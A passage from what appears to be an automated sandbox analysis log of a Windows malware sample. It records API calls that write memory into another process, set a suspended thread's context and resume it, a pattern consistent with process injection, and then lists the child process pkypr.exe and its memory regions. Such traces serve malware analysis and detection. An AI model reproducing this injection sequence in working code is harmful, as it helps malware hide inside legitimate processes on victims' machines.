returned 1 [0117.669] lstrlenW (lpString="pkypr.exe") returned 9 [0117.669] lstrlenW (lpString="ntdll.dll") returned 9 [0117.670] lstrlenW (lpString="pkypr.exe") returned 9 [0117.670] lstrlenW (lpString="ntdll.dll") returned 9 [0117.670] lstrlenW (lpString="ntdll.dll") returned 9 [0117.670] lstrlenW (lpString="ntdll.dll") returned 9 [0117.670] lstrlenW (lpString="tdll.dll") returned 8 [0117.670] lstrlenW (lpString="dll.dll") returned 7 [0117.670] lstrlenW (lpString="ll.dll") returned 6 [0117.670] lstrlenW (lpString="l.dll") returned 5 [0117.670] lstrlenW (lpString=".dll") returned 4 [0117.670] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0117.670] GetFileSize (in: hFile=0x1a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0117.670] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0117.670] ReadFile (in: hFile=0x1a0, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec68, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19ec68*=0x1784a0, lpOverlapped=0x0) returned 1 [0117.736] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0117.790] CloseHandle (hObject=0x1a0) returned 1 [0117.790] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.843] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.864] NtWriteVirtualMemory (in: ProcessHandle=0x198, BaseAddress=0x401000, Buffer=0x4b1000*, NumberOfBytesToWrite=0x2d200, NumberOfBytesWritten=0x19eccc | out: Buffer=0x4b1000*, NumberOfBytesWritten=0x19eccc*=0x2d200) returned 0x0 [0117.909] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec98 | out: Wow64Process=0x19ec98*=1) returned 1 [0117.909] lstrlenW (lpString="pkypr.exe") returned 9 [0117.909] lstrlenW (lpString="ntdll.dll") returned 9 [0117.909] lstrlenW (lpString="pkypr.exe") returned 9 [0117.909] lstrlenW (lpString="ntdll.dll") returned 9 [0117.909] lstrlenW (lpString="ntdll.dll") returned 9 [0117.909] lstrlenW (lpString="ntdll.dll") returned 9 [0117.910] lstrlenW (lpString="tdll.dll") returned 8 [0117.910] lstrlenW (lpString="dll.dll") returned 7 [0117.910] lstrlenW (lpString="ll.dll") returned 6 [0117.910] lstrlenW (lpString="l.dll") returned 5 [0117.910] lstrlenW (lpString=".dll") returned 4 [0117.910] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0117.910] GetFileSize (in: hFile=0x1a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0117.910] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0117.911] ReadFile (in: hFile=0x1a0, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec68, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19ec68*=0x1784a0, lpOverlapped=0x0) returned 1 [0117.949] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0117.998] CloseHandle (hObject=0x1a0) returned 1 [0117.999] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.021] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.050] NtWriteVirtualMemory (in: ProcessHandle=0x198, BaseAddress=0x37b008, Buffer=0x19f468*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19eccc | out: Buffer=0x19f468*, NumberOfBytesWritten=0x19eccc*=0x4) returned 0x0 [0118.054] SetThreadContext (hThread=0x194, lpContext=0x19f110*(ContextFlags=0x10007, Dr0=0x19f13c, Dr1=0x0, Dr2=0x19f25c, Dr3=0x77869ca4, Dr6=0x0, Dr7=0x778693b5, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x1a1714, FloatSave.ErrorSelector=0x7a0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x18, FloatSave.RegisterArea=([0]=0x3, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x2, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x3, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x2, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x1, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x25, [29]=0x2, [30]=0x0, [31]=0xc0, [32]=0xd4, [33]=0x57, [34]=0x68, [35]=0xf4, [36]=0xfa, [37]=0x94, [38]=0xd1, [39]=0x66, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0xf2, [46]=0x19, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x3, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x2, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xe8, [65]=0xf1, [66]=0x19, [67]=0x0, [68]=0xa0, [69]=0xf1, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x48, [77]=0x21, [78]=0x50, [79]=0x0), FloatSave.Cr0NpxState=0xf46857d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x37b000, Edx=0x0, Ecx=0x0, Eax=0x41f0e0, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25, [5]=0x2, [6]=0x0, [7]=0xc0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0xf2, [14]=0x19, [15]=0x0, [16]=0x2b, [17]=0xba, [18]=0x86, [19]=0x77, [20]=0x88, [21]=0xf2, [22]=0x19, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x9, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x50, [37]=0xf2, [38]=0x19, [39]=0x0, [40]=0x33, [41]=0xb8, [42]=0x86, [43]=0x77, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x59, [49]=0xb8, [50]=0x86, [51]=0x77, [52]=0x8e, [53]=0x97, [54]=0xd1, [55]=0x66, [56]=0xc8, [57]=0xf3, [58]=0x19, [59]=0x0, [60]=0x58, [61]=0xf4, [62]=0x19, [63]=0x0, [64]=0xc0, [65]=0xf3, [66]=0x19, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x4c, [73]=0xf2, [74]=0x19, [75]=0x0, [76]=0x88, [77]=0xf2, [78]=0x19, [79]=0x0, [80]=0xc8, [81]=0xf3, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x10, [93]=0xf2, [94]=0x19, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0xcc, [101]=0xff, [102]=0x19, [103]=0x0, [104]=0x30, [105]=0xee, [106]=0x8a, [107]=0x77, [108]=0xf6, [109]=0x44, [110]=0x5a, [111]=0x11, [112]=0xfe, [113]=0xff, [114]=0xff, [115]=0xff, [116]=0x59, [117]=0xb8, [118]=0x86, [119]=0x77, [120]=0x9e, [121]=0x1, [122]=0x87, [123]=0x77, [124]=0x20, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x4, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0xc0, [141]=0xf3, [142]=0x19, [143]=0x0, [144]=0x84, [145]=0xf2, [146]=0x19, [147]=0x0, [148]=0x1, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x58, [153]=0xf4, [154]=0x19, [155]=0x0, [156]=0xc0, [157]=0x1, [158]=0x87, [159]=0x77, [160]=0xea, [161]=0x97, [162]=0xd1, [163]=0x66, [164]=0x20, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x12, [173]=0x0, [174]=0x0, [175]=0x1, [176]=0x90, [177]=0xf2, [178]=0x19, [179]=0x0, [180]=0x6e, [181]=0x0, [182]=0x74, [183]=0x0, [184]=0x64, [185]=0x0, [186]=0x6c, [187]=0x0, [188]=0x6c, [189]=0x0, [190]=0x2e, [191]=0x0, [192]=0x64, [193]=0x0, [194]=0x6c, [195]=0x0, [196]=0x6c, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa3, [205]=0x97, [206]=0x86, [207]=0x77, [208]=0x9, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x40, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x9c, [277]=0xf3, [278]=0x19, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x18, [287]=0x0, [288]=0xe4, [289]=0xfd, [290]=0x19, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x86, [295]=0x77, [296]=0x98, [297]=0xf3, [298]=0x19, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x72, [305]=0x97, [306]=0xd1, [307]=0x66, [308]=0x88, [309]=0xf, [310]=0x51, [311]=0x0, [312]=0x98, [313]=0xf5, [314]=0x19, [315]=0x0, [316]=0xa6, [317]=0xad, [318]=0x8b, [319]=0x77, [320]=0x66, [321]=0xc1, [322]=0x88, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x2, [327]=0x0, [328]=0x38, [329]=0xf3, [330]=0x19, [331]=0x0, [332]=0x38, [333]=0xf3, [334]=0x19, [335]=0x0, [336]=0x38, [337]=0xf3, [338]=0x19, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x2, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x9a, [353]=0x96, [354]=0xd1, [355]=0x66, [356]=0xbc, [357]=0xf4, [358]=0x19, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xb5, [365]=0x93, [366]=0x86, [367]=0x77, [368]=0xe4, [369]=0xf3, [370]=0x19, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x2c, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x58, [381]=0xf9, [382]=0x19, [383]=0x0, [384]=0xe4, [385]=0xfd, [386]=0x19, [387]=0x0, [388]=0x30, [389]=0x94, [390]=0x86, [391]=0x77, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x12, [397]=0x0, [398]=0x0, [399]=0x1, [400]=0x16, [401]=0x0, [402]=0x18, [403]=0x0, [404]=0xe4, [405]=0xfd, [406]=0x19, [407]=0x0, [408]=0x64, [409]=0x0, [410]=0x6c, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x2e, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x1c, [425]=0xf9, [426]=0x19, [427]=0x0, [428]=0x9c, [429]=0xb7, [430]=0x86, [431]=0x77, [432]=0xc8, [433]=0xf3, [434]=0x19, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0xa2, [441]=0x97, [442]=0xd1, [443]=0x66, [444]=0x1, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x20, [449]=0xf4, [450]=0x19, [451]=0x0, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xcd, [465]=0x35, [466]=0x87, [467]=0x77, [468]=0x1, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x9, [477]=0x36, [478]=0x87, [479]=0x77, [480]=0x30, [481]=0xee, [482]=0x8a, [483]=0x77, [484]=0x48, [485]=0x21, [486]=0x50, [487]=0x0, [488]=0x4c, [489]=0xf4, [490]=0x19, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x1c, [505]=0xf9, [506]=0x19, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0118.056] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ecc0 | out: Wow64Process=0x19ecc0*=1) returned 1 [0118.057] lstrlenW (lpString="pkypr.exe") returned 9 [0118.057] lstrlenW (lpString="ntdll.dll") returned 9 [0118.057] lstrlenW (lpString="pkypr.exe") returned 9 [0118.057] lstrlenW (lpString="ntdll.dll") returned 9 [0118.057] lstrlenW (lpString="ntdll.dll") returned 9 [0118.057] lstrlenW (lpString="ntdll.dll") returned 9 [0118.057] lstrlenW (lpString="tdll.dll") returned 8 [0118.057] lstrlenW (lpString="dll.dll") returned 7 [0118.057] lstrlenW (lpString="ll.dll") returned 6 [0118.057] lstrlenW (lpString="l.dll") returned 5 [0118.057] lstrlenW (lpString=".dll") returned 4 [0118.057] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0118.057] GetFileSize (in: hFile=0x1a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0118.057] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0118.058] ReadFile (in: hFile=0x1a0, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec90, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19ec90*=0x1784a0, lpOverlapped=0x0) returned 1 [0118.086] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0118.115] CloseHandle (hObject=0x1a0) returned 1 [0118.115] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.146] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.165] NtResumeThread (in: ThreadHandle=0x194, SuspendCount=0x19ecdc | out: SuspendCount=0x19ecdc*=0x1) returned 0x0 [0118.238] ExitProcess (uExitCode=0x0) Thread: id = 6 os_tid = 0x184 Thread: id = 7 os_tid = 0x56c Process: id = "3" image_name = "pkypr.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe" page_root = "0x6cc55000" os_pid = "0x650" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xca4" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 431 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 432 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 433 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 434 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 435 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 436 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 437 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 438 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 439 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 440 start_va = 0x400000 end_va = 0x404fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "pkypr.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe") Region: id = 441 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 442 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 443 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 444 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 445 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 446 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 449 start_va = 0x400000 end_va = 0x42efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 458 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 459 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 460 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 461 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 462 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 463 start_va = 0x470000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 464 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 465 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 466 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 467 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 468 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 469 start_va = 0x6c0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 470 start_va = 0x840000 end_va = 0x9bcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 471 start_va = 0x9c0000 end_va = 0xcb9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 472 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 473 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 474 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 475 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 476 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 477 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 478 start_va = 0x470000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 479 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 480 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 481 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 482 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 483 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 484 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 485 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 486 start_va = 0x1d0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 487 start_va = 0x430000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 488 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 489 start_va = 0x4b0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 490 start_va = 0x8c0000 end_va = 0x97efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 950 start_va = 0x4d0000 end_va = 0x4e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 951 start_va = 0x980000 end_va = 0x993fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 953 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 954 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 955 start_va = 0xcc0000 end_va = 0xe47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 956 start_va = 0xe50000 end_va = 0xe79fff monitored = 0 entry_point = 0xe55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 957 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 958 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 959 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 960 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 961 start_va = 0xe50000 end_va = 0xfd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 962 start_va = 0xfe0000 end_va = 0x23dffff monitored 